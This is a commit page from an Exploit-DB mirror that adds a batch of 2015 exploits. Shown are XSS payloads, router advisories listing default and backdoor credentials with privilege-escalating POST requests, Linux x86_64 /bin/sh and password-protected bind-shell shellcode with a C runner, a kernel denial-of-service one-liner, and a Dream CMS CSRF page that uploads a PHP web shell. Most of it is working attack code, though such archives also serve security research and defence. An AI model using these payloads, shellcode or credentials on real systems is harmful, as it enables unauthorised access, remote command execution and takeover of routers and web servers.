bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-10-16

Browse source 
17 new exploits
This commit is contained in:
Offensive Security 2015-10-16 05:02:10 +00:00
parent 01940201cb
commit aa57287847
18 changed files with 1243 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
files.csv
View file

@ -34452,6 +34452,7 @@ id,file,description,date,author,platform,type,port
38148,platforms/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80
38203,platforms/linux/remote/38203.txt,"Schmid Watson Management Console Directory Traversal Vulnerability",2013-01-09,"Dhruv Shah",linux,remote,0
38204,platforms/php/webapps/38204.txt,"Prizm Content Connect Arbitrary File Upload Vulnerability",2013-01-09,"Include Security Research",php,webapps,0
38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux x86_64 - /bin/sh",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0
38151,platforms/windows/remote/38151.py,"Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0
38152,platforms/php/webapps/38152.txt,"MotoCMS admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,php,webapps,0
38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) /webmail/x3/mail/clientconf.html acct Parameter XSS",2012-12-27,"Christy Philip Mathew",php,webapps,0
@ -34727,10 +34728,26 @@ id,file,description,date,author,platform,type,port
38440,platforms/php/webapps/38440.txt,"phpMyAdmin 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0
38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection Vulnerability",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0
38444,platforms/win32/dos/38444.py,"Tomabo MP4 Converter 3.10.12 - 3.11.12 (.m3u) Denial of service (Crush application)",2015-10-11,"mohammed Mohammed",win32,dos,0
38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - CSRF Add Extension And File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0
38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - File Path Traversal Vulnerability",2015-10-13,"Karn Ganeshen",hardware,webapps,0
38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0
38450,platforms/php/webapps/38450.txt,"Kerio Control <= 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0
38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel NetUSB - Remote Code Execution Exploit",2015-10-14,blasty,multiple,remote,0
38455,platforms/hardware/webapps/38455.txt,"ZyXEL PMG5318-B20A - OS Command Injection Vulnerability",2015-10-14,"Karn Ganeshen",hardware,webapps,0
38456,platforms/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow",2015-10-14,ArminCyber,windows,local,0
38458,platforms/php/webapps/38458.txt,"WordPress Spider Video Player Plugin 'theme' Parameter SQL Injection Vulnerability",2013-04-11,"Ashiyane Digital Security Team",php,webapps,0
38459,platforms/php/webapps/38459.txt,"Request Tracker 'ShowPending' Parameter SQL Injection Vulnerability",2013-04-11,cheki,php,webapps,0
38452,platforms/windows/local/38452.txt,"CDex Genre 1.79 - Stack Buffer Overflow",2015-10-13,Un_N0n,windows,local,0
38453,platforms/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",hardware,remote,0
38460,platforms/jsp/webapps/38460.txt,"jPlayer 'Jplayer.swf' Script Cross Site Scripting Vulnerability",2013-03-29,"Malte Batram",jsp,webapps,0
38461,platforms/java/webapps/38461.txt,"Hero Framework /users/login username Parameter XSS",2013-04-10,"High-Tech Bridge",java,webapps,0
38462,platforms/java/webapps/38462.txt,"Hero Framework /users/forgot_password error Parameter XSS",2013-04-10,"High-Tech Bridge",java,webapps,0
38463,platforms/multiple/webapps/38463.txt,"Aibolit Information Disclosure Vulnerability",2013-04-13,MustLive,multiple,webapps,0
38464,platforms/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router Multiple Security Vulnerabilities",2013-04-15,"Phil Purviance",hardware,remote,0
38465,platforms/linux/local/38465.txt,"Linux Kernel <= 3.2.1 Tracing Mutiple Local Denial of Service Vulnerabilities",2013-04-15,anonymous,linux,local,0
38467,platforms/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Stack Based Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0
38469,platforms/lin_x86-64/shellcode/38469.c,"Linux x86_64 Bindshell with Password (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0
38470,platforms/hardware/webapps/38470.txt,"netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0
38471,platforms/hardware/webapps/38471.txt,"PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0
38472,platforms/windows/local/38472.py,"Blat.exe 2.7.6 SMTP / NNTP Mailer - Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0
38474,platforms/windows/local/38474.txt,"Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0

Can't render this file because it is too large.

25
platforms/hardware/remote/38464.txt Executable file
View file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/59054/info
Cisco Linksys EA2700 routers is prone to the following security vulnerabilities:
1. A security-bypass vulnerability
2. A cross-site request-forgery vulnerability
3. A cross-site scripting vulnerability
An attacker can exploit these issues to bypass certain security restrictions, steal cookie-based authentication credentials, gain access to system and other configuration files, or perform unauthorized actions in the context of a user session.
Cisco Linksys EA2700 running firmware 1.0.12.128947 is vulnerable.
The following example request is available:
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
submit_button=xss'%3balert(1)//934&action=Apply

218
platforms/hardware/webapps/38470.txt Executable file
View file

@ -0,0 +1,218 @@
# Exploit Title: [netis RealTek wireless router / ADSL modem Multiple
Vulnerabilities]
# Discovered by: Karn Ganeshen
# Reported on: [October 13, 2015]
# Vendor Response: [Vulnerability? What's this?]
# Vendor Homepage: [www.netis-systems.com]
# Version Affected: [Firmware version RTK v2.1.1]
**Vulnerability Details**
* 1. Default, weak passwords for http and ftp services *
a. *HTTP accounts*
- guest/guest
- user/user
- guest/XXXXairocon
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="guest"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x2"/>
</chain>
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x0"/> </chain>
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/> </chain>
*XXXX -> last four digits of MAC address *
b. *FTP accounts*
- admin/admin
- useradmin/useradmin
- user/user
<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="admin"/>
<V N="PASSWORD" V="admin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x3"/>
<V N="INSTNUM" V="0x1"/> </chain>
<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="useradmin"/>
<V N="PASSWORD" V="useradmin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x2"/>
<V N="INSTNUM" V="0x2"/> </chain>
<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x1"/>
<V N="INSTNUM" V="0x3"/> </chain>
2. *Backdoor accounts*
The device comes configured with privileged, backdoor account.
For HTTP, 'guest' with attribute <V N="BACKDOOR" V="0x1"/>, is the backdoor
account. This is seen in the config file:
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/>
</chain>
This user is not shown / visible in the user list when logged in as guest
(privileged user).
3. *No CSRF protection*
There is no CSRF token set in any of the forms / pages.
It is possible to silently execute HTTP requests if the user is logged in.
4. *Weak RBAC controls *
5a) *A non-root/non-admin user (user) can create and delete any other
users, including root-privileged accounts. *
In netis RealTek wireless router ADSL modem, there are three users:
guest:guest -> priv 2 is super user account with full functional access
user:user -> priv 0 -> can access only some functions
guest:XXXXairocon -> privileged backdoor login
*Normally: *
- user can create new account with restricted user privs only.
- user can change its password and only other non-root users.
- user can delete any other non-root users.
However, the application does not enforce strict rbac and it is possible
for a non-root user to create a new user with root privileges.
This is done as follows:
1. Start creating a new user, and intercepting the user creation POST
request
2. Intercept & Change privilege parameter value from 0 (user) to 2 (root) -
Submit request
3. When the new root user is created successfully, it does not show up in
user list
4. Confirm via logging in as new root, and / or configured accounts in
configuration file (config.img)
This is the POST request to create a new user:
*Create user http request*:
POST /form2userconfig.cgi HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm?v=
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=
*Note1*: In some cases, this password change function is not accessible to
'user' via GUI. But we can still send a POST request to create a valid, new
root privileged account.
*Note2*: In some cases, application does not create root priv user, in the
first attempt. However, in the 2nd or 3rd attempt, new user is created
without any issue.
*Delete user http request:*
A non-root/non-admin user can delete any configured user(s) including
privileged users (guest).
POST /form2userconfig.cgi HTTP/1.1
Host: <ip>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%
In case (non-root) user is deleting a root login (guest, priv 2), action
status can be confirmed by checking the configuration In case (non-root)
user is deleting a user login (priv 0), action status can be confirmed by
checking the user list.
5b) *(non-root priv) User can access unauthorized functions.*
Normally, 'user' does not have access to all the functionality of the
device. It has access to Status, Setup and Maintenance.
However, few functions can still be accessed by calling them directly. For
example, to access the mac filtering configuration this url can be opened
directly:
http://<IP>/fw-macfilter.htm
Other functions may also be accessible in this manner.
6. *Sensitive information not secured from low privileged users *
A non-root / non-admin privileged user has access to download the
configuration file - config.img.
This file contains clear-text passwords, keys and other sensitive
information which can be used to gain privileged access.
7. *Sensitive information accessible in clear-text*
Sensitive Information like passwords and keys are not secured properly.
Mostly these are either shown in clear-text or cen censored *****, it is
possible to view clear-text values by 'Inspect Element' locally or
intercepting http requests, or sniffing.
--
Best Regards,
Karn Ganeshen

219
platforms/hardware/webapps/38471.txt Executable file
View file

@ -0,0 +1,219 @@
# Exploit Title: [PROLiNK H5004NK ADSL Wireless Modem Multiple
Vulnerabilities]
# Discovered by: Karn Ganeshen
# Reported on: [October 13, 2015]
# Vendor Response: [No process to handle vuln reports]
# Vendor Homepage: [
http://www.prolink2u.com/newtemp/datacom/adsl-modem-router/381-h5004nk.html]
# Version Affected: [Firmware version R76S Slt 4WNE1 6.1R]
**Vulnerability Details**
*1. Default, weak passwords for http and ftp services *
a. *HTTP accounts*
- admin/password
- user/user
- guest/XXXXairocon
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="admin"/>
<V N="PASSWORD" V="password"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x2"/>
</chain>
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x0"/> </chain>
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/> </chain>
*XXXX -> last four digits of MAC address *
b. *FTP accounts*
- admin/admin
- useradmin/useradmin
- user/user
<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="admin"/>
<V N="PASSWORD" V="admin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x3"/>
<V N="INSTNUM" V="0x1"/> </chain>
<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="useradmin"/>
<V N="PASSWORD" V="useradmin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x2"/>
<V N="INSTNUM" V="0x2"/> </chain>
<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x1"/>
<V N="INSTNUM" V="0x3"/> </chain>
2. *Backdoor accounts*
The device comes configured with privileged, backdoor account.
For HTTP, 'guest' with attribute <V N="BACKDOOR" V="0x1"/>, is the backdoor
account. This is seen in the config file:
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/>
</chain>
This user is not shown / visible in the user list when logged in as admin
(privileged user).
3. *No CSRF protection*
There is no CSRF token set in any of the forms / pages.
It is possible to silently execute HTTP requests if the user is logged in.
4. *Weak RBAC controls *
5a) *A non-admin user (user) can create and delete any other users,
including root-privileged accounts. *
There are three users:
admin:password -> priv 2 is super user account with full functional access
(admin/root)
user:user -> priv 0 -> can access only some functions (user)
guest:XXXXairocon -> privileged backdoor login
*Normally: *
- user can create new account with restricted user privs only.
- user can change its password and only other non-admin users.
- user can delete any other non-admin users.
However, the application does not enforce strict rbac and it is possible
for a non-admin user to create a new account with admin privileges.
This is done as follows:
1. Start creating a new user, and intercepting the user creation POST
request
2. Intercept & Change privilege parameter value from 0 (user) to 2 (admin)
- Submit request
3. When the new admin user is created successfully, it does not show up in
user list
4. Confirm via logging in as new admin, and / or configured accounts in
configuration file (config.img)
This is the POST request to create a new user:
*Create user http request*:
POST /form2userconfig.cgi HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm?v=
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=
*Note1*: In some cases, this password change function is not accessible to
'user' via GUI. But we can still send a POST request to create a valid, new
higher privileged account.
*Note2*: In some cases, application does not create admin priv user, in the
first attempt. However, in the 2nd or 3rd attempt, new user is created
without any issue.
*Delete user http request:*
A non-admin user can delete any configured user(s) including privileged
users (admin).
POST /form2userconfig.cgi HTTP/1.1
Host: <ip>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%
In case (non-admin) user is deleting the admin login (priv 2), action
status can be confirmed by checking the configuration.
In case (non-admin) user is deleting another user login (priv 0), action
status can be confirmed by checking the user list.
5b) *(non-admin priv) User can access unauthorized functions.*
Normally, 'user' does not have access to all the functionality of the
device. It has access to Status, Setup and Maintenance.
However, few functions can still be accessed by calling them directly. For
example, to access the mac filtering configuration this url can be opened
directly:
http://<IP>/fw-macfilter.htm
Other functions may also be accessible in this manner.
6. *Sensitive information not secured from low privileged users *
A non-admin privileged user has access to download the configuration file
- config.img.
This file contains clear-text passwords, keys and other sensitive
information which can be used to gain privileged access.
7. *Sensitive information accessible in clear-text*
Sensitive Information like passwords and keys are not secured properly.
Mostly these are either shown in clear-text or cen censored *****, it is
possible to view clear-text values by 'Inspect Element' locally or
intercepting http requests, or sniffing.
--
Best Regards,
Karn Ganeshen

9
platforms/java/webapps/38461.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/59041/info
Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Hero 3.791 is vulnerable; other versions may also be affected.
http://www.example.com/users/login?username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

9
platforms/java/webapps/38462.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/59041/info
Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Hero 3.791 is vulnerable; other versions may also be affected.
http://www.example.com/users/forgot_password?error=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==

7
platforms/jsp/webapps/38460.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/59030/info
jPlayer is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/Jplayer.swf?id=%3Cimg%20src=x%20onerror=alert\u0028\u0027moin\u0027\u0029%3E&jQuery=document.write

90
platforms/lin_x86-64/shellcode/38150.txt Executable file
View file

@ -0,0 +1,90 @@
# Exploit Title: Shellcode /bin/sh for Linux x86_64 (different approach)
# Date: 2015-09-10
# Exploit Author: Fanda Uchytil
# Version: 1
# Tested on: Linux 3.16.0-4-amd64 (Debian), 2.6.32-openvz-042stab093.5-amd64 (Centos/RHEL based), 2.6.32-5-amd64 (Debian)
AT&T VERSION (for smooth debug)
-------------------------------
.global _start
.text
_start:
# int execve(const char *filename, char *const argv[], char *const envp[]);
xor %rax, %rax
add $59, %rax # Linux 64b execve
xor %rdi, %rdi
push %rdi # '\0' for termination of string below
mov $0x68732F2f6e69622F, %rdi # "/bin//sh" (slash padding)
push %rdi
lea (%rsp), %rdi
xor %rsi, %rsi # no shell arguments
xor %rdx, %rdx # no env vars
syscall
$ gcc -nostdlib shellcode_atnt.s -o shellcode_atnt && objdump -d shellcode_atnt
$ ./shellcode_atnt
$ gdb -q ./shellcode_atnt
Disassembly of section .text:
4000d4: 48 31 c0 xor %rax,%rax
4000d7: 48 83 c0 3b add $0x3b,%rax
4000db: 48 31 ff xor %rdi,%rdi
4000de: 57 push %rdi
4000df: 48 bf 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rdi
4000e6: 2f 73 68
4000e9: 57 push %rdi
4000ea: 48 8d 3c 24 lea (%rsp),%rdi
4000ee: 48 31 f6 xor %rsi,%rsi
4000f1: 48 31 d2 xor %rdx,%rdx
4000f4: 0f 05 syscall
INTEL VERSION
-------------
BITS 64
xor rax, rax
add rax, 59
xor rdi, rdi
push rdi
mov rdi, 0x68732F2f6e69622F
push rdi
lea rdi, [rsp]
xor rsi, rsi
xor rdx, rdx
syscall
$ nasm shellcode.a
SHELLCODE_TEST.C
----------------
int main(int argc, char **argv) {
int (*f)() = (int(*)()) argv[1];
return (*f)();
}
$ gcc -o shellcode_test shellcode_test.c -z execstack # or use `execstack(8)` before command below
$ ./shellcode_test "$(cat shellcode)"
STRING
------
$ xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\&/g'
\48\31\c0\48\83\c0\3b\48\31\ff\57\48\bf\2f\62\69\6e\2f\2f\73\68\57\48\8d\3c\24\48\31\f6\48\31\d2\0f\05
$ ./shellcode_test "$(printf "$(xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\x&/g')")"

121
platforms/lin_x86-64/shellcode/38469.c Executable file
View file

@ -0,0 +1,121 @@
/*
;Title: bindshell with password in 92 bytes
;Author: David Velázquez a.k.a d4sh&r
;Contact: https://mx.linkedin.com/in/d4v1dvc
;Description: x64 Linux bind TCP port shellcode on port 31173 with 4 bytes as password in 94 bytes
;Tested On: Linux kali64 3.18.0-kali3-amd64 x86_64 GNU/Linux
;Compile & Run: nasm -f elf64 -o bindshell.o bindshell.nasm
; ld -o bindshell bindshell.o
; ./bindshell
;SLAE64-1379
global _start
_start:
socket:
;int socket(int domain, int type, int protocol)2,1,0
xor esi,esi ;rsi=0
mul esi ;rdx,rax,rsi=0, rdx is 3rd argument
inc esi ;rsi=1, 2nd argument
push 2
pop rdi ;rdi=2,1st argument
add al, 41 ;socket syscall
syscall
push rax ;socket result
pop rdi ;rdi=sockfd
;struct sockaddr_in {
; sa_family_t sin_family; /* address family: AF_INET */
; in_port_t sin_port; /* port in network byte order */
; struct in_addr sin_addr; /* internet address */
;};
push 2 ;AF_INET
mov word [rsp + 2], 0xc579 ;port 31173
push rsp
pop rsi ;rsi=&sockaddr
bind:
;int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen)
push rdx ;initialize with 0 to avoid SEGFAULT
push 16
pop rdx ;rdx=16 (sizeof sockaddr)
push 49 ;bind syscall
pop rax
syscall
listen:
;int listen(int sockfd, int backlog)
pop rsi
mov al, 50 ;listen syscall
syscall
accept:
;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
mov al, 43 ;accept syscall
syscall
;store client
push rax ;accept result(client)
pop rdi ;rdi=client
;don't to close parent to have a small shellcode
;in a loop is necessary to close the conection!!
password:
;ssize_t read(int fd, void *buf, size_t count)
push rsp ;1st argument
pop rsi ;2nd argument
xor eax, eax ;read syscall
syscall
cmp dword [rsp], '1234' ;"1234" like password
jne error ; if wrong password then crash program
;int dup2(int oldfd, int newfd)
push 3
pop rsi
dup2:
dec esi
mov al, 33 ;dup2 syscall applied to error,output and input
syscall
jne dup2
execve:
;int execve(const char *filename, char *const argv[],char *const envp[])
push rsi
pop rdx ;3rd argument
push rsi ;2nd argument
mov rbx, 0x68732f2f6e69622f ;1st argument /bin//sh
push rbx
push rsp
pop rdi
mov al, 59 ;execve
syscall
error:
;SEGFAULT
*/
#include<stdio.h>
#include<string.h>
//gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
unsigned char code[] = \
"\x31\xf6\xf7\xe6\xff\xc6\x6a\x02\x5f\x04\x29\x0f\x05\x50\x5f\x6a\x02\x66\xc7\x44\x24\x02\x79\xc5\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x50\x5f\x54\x5e\x31\xc0\x0f\x05\x81\x3c\x24\x31\x32\x33\x34\x75\x1f\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x56\x5a\x56\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

8
platforms/linux/local/38465.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/59055/info
The Linux kernel is prone to multiple local denial-of-service vulnerabilities.
Attackers can exploit these issues to trigger a kernel crash, which may result in a denial-of-service condition.
cd /sys/kernel/debug/tracing
echo 1234 | sudo tee -a set_ftrace_pid

7
platforms/multiple/webapps/38463.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/59053/info
Aibolit is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
http://www.example.com/AI-BOLIT-REPORT-<date>-< time>.html

125
platforms/php/webapps/38446.html Executable file
View file

@ -0,0 +1,125 @@
<!--
Dream CMS 2.3.0 CSRF Add Extension And File Upload PHP Code Execution
Vendor: Dream CMS
Product web page: http://www.dream-cms.kg
Affected version: 2.3.0
Summary: DreamCMS is open and completely free PHP web application
for constructing websites of any complexity.
Desc: Dream CMS allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be
exploited to perform certain actions with administrative privileges if a
logged-in user visits a malicious web site. Related to the CSRF issue, an
authenticated arbitrary PHP code execution exist. The vulnerability is caused
due to the improper verification of uploaded files in '/files-manager-administration/add-file'
script via the 'file' POST parameter which allows of arbitrary files being
uploaded in '/resource/filemanager/1/home/' where the admin first needs to add
the file extension in the allowed list (csrf'd). This can be exploited to execute
arbitrary PHP code by uploading a malicious PHP script file and execute system
commands.
Tested on: nginx/1.6.2
PHP/5.5.28
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5268
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5268.php
01.10.2015
-->
<html>
<head>
<title>Dream CMS 2.3.0 CSRF Add Extension And File Upload PHP Code Execution</title>
</head>
<body onload="exploitrun();">
<!-- 1. Add PHP allowed extension -->
<form name="addext" action="http://TARGET/pages/en/files-manager-administration/settings" method="POST" target="frame0">
<input type="hidden" name="form&#95;name" value="settings" />
<input type="hidden" name="file&#95;manager&#95;allowed&#95;extensions" value="bmp&#44;gif&#44;jpg&#44;png&#44;mp3&#44;wav&#44;wma&#44;3g2&#44;3gp&#44;avi&#44;flv&#44;mov&#44;mp4&#44;mpg&#44;swf&#44;vob&#44;wmv&#44;zip&#44;rar&#44;txt&#44;doc&#44;docx&#44;pdf&#44;php" />
<input type="hidden" name="file&#95;manager&#95;allowed&#95;size" value="2097152" />
<input type="hidden" name="file&#95;manager&#95;file&#95;name&#95;length" value="20" />
<input type="hidden" name="file&#95;manager&#95;image&#95;extensions" value="bmp&#44;gif&#44;jpg&#44;png" />
<input type="hidden" name="file&#95;manager&#95;media&#95;extensions" value="mp3&#44;wav&#44;wma&#44;3g2&#44;3gp&#44;avi&#44;flv&#44;mov&#44;mp4&#44;mpg&#44;swf&#44;vob&#44;wmv" />
<input type="hidden" name="file&#95;manager&#95;window&#95;width" value="60" />
<input type="hidden" name="file&#95;manager&#95;window&#95;height" value="500" />
<input type="hidden" name="file&#95;manager&#95;window&#95;image&#95;height" value="300" />
<input type="hidden" name="submit" value="Save" />
</form>
<!-- 2. Upload PHP file -->
<script>
function upload()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://TARGET/pages/en/files-manager-administration/add-file?path=home", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryuCEcIcPhpF3WD8Sv");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
"Content-Disposition: form-data; name=\"form_name\"\r\n" +
"\r\n" +
"file\r\n" +
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"billy.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php\r\n" +
"system($_GET[\"cmd\"]);\r\n" +
"?\x3e\r\n" +
"\r\n" +
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Submit\r\n" +
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
